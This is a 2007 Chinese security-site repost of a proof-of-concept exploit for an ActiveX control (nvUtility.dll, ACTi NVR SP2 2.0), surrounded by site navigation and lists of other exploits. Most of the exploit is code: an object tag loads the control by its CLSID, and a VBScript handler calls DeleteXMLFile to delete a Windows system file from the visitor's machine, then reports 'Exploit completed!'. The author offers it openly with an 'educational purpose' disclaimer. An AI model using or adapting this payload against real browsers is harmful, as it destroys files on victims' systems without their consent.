网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) DeleteXMLFile() Inscure Method  

NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) DeleteXMLFile() Inscure Method

2007-09-03  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

----------------------------------------------------------------------------------------------
 NVR SP2 2.0 nvUtility.Utility.1 (nvUtility.dll v. 1.0.14.0) "DeleteXMLFile()" Inscure Method
 url: http://www.acti.com/index.asp

网管论坛bbs_bitsCN_com

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

网管网www_bitscn_com

 This control is marked as:
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe: Safe for untrusted: caller
 KillBitSet: Falso
----------------------------------------------------------------------------------------------

网管联盟bitsCN_com

<object classid='clsid:A0D43FB0-116B-47AB-80FB-6DCFA92A03E3' id='test'></object>

网管网www.bitscn.com

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

网管论坛bbs_bitsCN_com

<script language='vbscript'>
 Sub tryMe
  Dim MyMsg 
   test.DeleteXMLFile "c:windowssystem_.ini"
   MyMsg = MsgBox("Exploit completed!")
 End Sub
</script>

网管u家u.bitscn@com


TAGs         "   <   for   Safe   >   be   shinnai   all   This      
 上一篇:BitchX 1.1 Final MODE Remote Heap Overflow Exploit (0-day)   下一篇:NVR SP2 2.0 (nvUnifiedControl.dll v. 1.1.45.0) SetText() Remote Exploit
相关文章列表
NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) DeleteXMLFile() Inscure Method 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Mambo Component eWriting 1.2.1 (cat) S
2.Zune Software ActiveX Arbitrary File O
3.123 Flash Chat Module for phpBB remote
4.VLC <= 0.8.6e Subtitle Parsing Loca
5.Intel Centrino 2200BG Wireless Driver
6.Fully Modded phpBB (kb.php) Remote SQL
7.Crysis <= 1.1.1.5879 Remote Format
8.Linksys WRT54G (firmware 1.00.9) Secur
9.PHPauction GPL Enhanced 2.51 Multiple
10.OpenInvoice 0.9 Arbitrary Change User
最新推荐文章:
1.Cheats Complete Website 1.1.1 (itemid)
2.Drinks Complete Website 2.1.0 (drinkid
3.BitDefender Online Scanner 8 ActiveX H
4.PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA
5.PHP COM extensions (inconsistent Win32
6.PHP 4.4.6 crack_opendict() Local Buffe
7.Internet Explorer ActiveX bgColor Prop
8.CVSTrac 2.0.0 Post-Attack Database Res
9.GuppY <= 4.5.16 Remote Commands Exe
10.Trend Micro VirusWall Buffer Overflow
网管论坛交流:
·不疯魔不成活
·令你大开眼界的真正标准化机房,已整理重
·华为HCSE OSPF路由协议培训教材 V3.0
·为赈灾,女孩舍身拍“裸照”
·Windows Server 2003服务器群集创建和配
·exchange2k3全套官方资料
·双儿一周岁了。。。特殊的礼物来啦。。
·存储备份技术版块守则
·无盘技术交流区守则
·DOS命令基础大全之命令详解<作者吐血